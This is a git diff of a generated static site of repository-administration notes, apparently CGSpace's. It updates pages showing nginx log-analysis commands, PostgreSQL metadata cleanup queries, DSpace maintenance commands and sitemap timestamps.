                                                                                                                                                                                                                                                                                                                                                                                            +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                             106781
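The two REST counts above can be reduced to a single share. This is a minimal sketch, assuming GNU `zcat`, `grep`, and `awk` and the same nginx log layout. `count_requests` and `percent` are hypothetical helper names used for illustration only and are not part of any CGSpace script:

```shell
# Hypothetical helper: count log lines that match a date pattern and a
# request-path pattern. Arguments: date regex, path regex, then log files.
count_requests() {
    local date_pattern="$1"
    local path_pattern="$2"
    shift 2
    # --force lets zcat pass uncompressed files through unchanged
    zcat --force "$@" | grep -E "$date_pattern" | grep -c -E "$path_pattern"
}

# Hypothetical helper: print part/total as a percentage with one decimal.
percent() {
    awk -v part="$1" -v total="$2" 'BEGIN { printf "%.1f\n", 100 * part / total }'
}

# Share of bitstream requests among all REST requests, using the counts
# reported above (no log access needed).
percent 106781 1183456   # prints 9.0
```

Against the real logs the first helper would be called as `count_requests '[0-9]{1,2}/Oct/2019' '/rest/bitstreams' /var/log/nginx/rest.log.*.gz`, which should reproduce the second count shown above.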
                                                                                                                                                                                                                                                                                                                                                                                             
Read more →
@@ -143,7 +143,7 @@

- 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace. I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data. I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unnecessary Unicode” fix: $ csvcut -c 'id,dc.
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace. I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data. I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unnecessary Unicode” fix: $ csvcut -c 'id,dc.
Read more →
@@ -166,7 +166,7 @@
                                                                                                                                                                                                                                                                                                                                                                                          • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                          • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                               440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                               441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                               485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                          @@ -177,7 +177,7 @@
                                                                                                                                                                                                                                                                                                                                                                                               814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                              2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                              6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                          @@ -338,16 +338,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                          4432 200
                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                      • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                      • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                       
 Read more →
@@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                    • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                    • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                         245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                         332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                         385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                    @@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                  • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                   3018243
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  index 2fcdec928..eb1fac6f4 100644
                                                                                                                                                                                                                                                                                                                                                                                  --- a/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  +++ b/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                  @@ -110,7 +110,7 @@
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                      92 40.77.167.4
                                                                                                                                                                                                                                                                                                                                                                                      99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                     120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                @@ -308,7 +308,7 @@
                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                              • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                              • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                              • Time to index ~70,000 items on CGSpace:
diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html
index de2f18c80..8fa52e3de 100644
--- a/docs/posts/page/6/index.html
+++ b/docs/posts/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -166,11 +166,11 @@
                                                                                                                                                                                                                                                                                                                                                                              • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                              2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                              -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                              +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-23:4
                                                                                                                                                                                                                                                                                                                                                                              @@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                               0
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                               COPY 54701
                                                                                                                                                                                                                                                                                                                                                                               
Read more →
diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html
index 83cdeea49..50ae97f8b 100644
--- a/docs/posts/page/7/index.html
+++ b/docs/posts/page/7/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                            • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                            • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                             
Read more →
@@ -210,7 +210,7 @@
                                                                                                                                                                                                                                                                                                                                                                            • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                               id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                             -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                              92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                            @@ -268,11 +268,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                          • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                          • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                          2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                          • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                          • I’ve raised a ticket with Atmire to ask
@@ -354,7 +354,7 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                          • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                          • It looks like we might be able to use OUs now, instead of DCs:
                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                           
Read more →
diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html
index 8518ed98e..905d5e6c5 100644
--- a/docs/posts/page/8/index.html
+++ b/docs/posts/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                                        • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                                        • I think this query should find and replace all authors that have “,” at the end of their names:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                         UPDATE 95
                                                                                                                                                                                                                                                                                                                                                                        -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                        +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                          text_value
                                                                                                                                                                                                                                                                                                                                                                         ------------
                                                                                                                                                                                                                                                                                                                                                                         (0 rows)
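To preview what the `regexp_replace` pattern above does before running the `UPDATE`, the same substitution can be tried locally on sample strings. This is only a sketch under assumptions: it uses `sed` rather than PostgreSQL, the function name `strip_trailing_comma` is made up for illustration, and because POSIX extended regular expressions have no non-greedy `+?`, it uses the greedy form, which gives the same result here since the match is anchored on the final `,$`.

```shell
# Hypothetical helper: strip exactly one trailing comma from each input line.
# Lines that do not end in a comma pass through unchanged.
strip_trailing_comma() {
    sed -E 's/^(.+),$/\1/'
}

# Example: the comma inside the name is kept, only the trailing one is removed.
printf 'Orth, Alan,\nOrth, Alan\n' | strip_trailing_comma
```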
                                                                                                                                                                                                                                                                                                                                                                        @@ -198,7 +198,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                      • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                                      • There are 3,000 IPs accessing the REST API in a 24-hour period!
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                       3168
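Note that `uniq` only collapses adjacent duplicate lines, so on an unsorted access log the figure above may count the same IP more than once. A minimal sketch of a stricter count, assuming the client IP is the first whitespace-separated field as in the command above (the function name `count_unique_ips` is hypothetical):

```shell
# Hypothetical helper: count distinct values of the first field in a log file.
# sort -u deduplicates across the whole file, not just adjacent lines.
count_unique_ips() {
    awk '{print $1}' "$1" | sort -u | wc -l | tr -d ' '
}

# Usage, with the log path from the notes above:
# count_unique_ips /var/log/nginx/rest.log
```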
                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                      Read more → @@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                    • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                                    • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                     78
                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                    Read more → diff --git a/docs/sitemap.xml b/docs/sitemap.xml index 102c7b085..80ccc49af 100644 --- a/docs/sitemap.xml +++ b/docs/sitemap.xml @@ -3,19 +3,19 @@ xmlns:xhtml="http://www.w3.org/1999/xhtml"> https://alanorth.github.io/cgspace-notes/categories/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/2022-03/ - 2022-03-01T16:46:54+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/categories/notes/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/posts/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/2022-02/ 2022-03-01T17:17:27+03:00 diff --git a/docs/tags/index.html b/docs/tags/index.html index 5c167b922..335b05c1e 100644 --- a/docs/tags/index.html +++ b/docs/tags/index.html @@ -17,7 +17,7 @@ - + diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html index d99d42992..9f5739f67 100644 --- a/docs/tags/migration/index.html +++ b/docs/tags/migration/index.html @@ -17,7 +17,7 @@ - + diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html index a1fd3509a..cfaad2f96 100644 --- a/docs/tags/notes/index.html +++ b/docs/tags/notes/index.html @@ -17,7 +17,7 @@ - + @@ -227,7 +227,7 @@
                                                                                                                                                                                                                                                                                                                                                                  • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                  • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                  Read more → @@ -286,7 +286,7 @@
                                                                                                                                                                                                                                                                                                                                                                  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from collection2item where item_id = '80278';
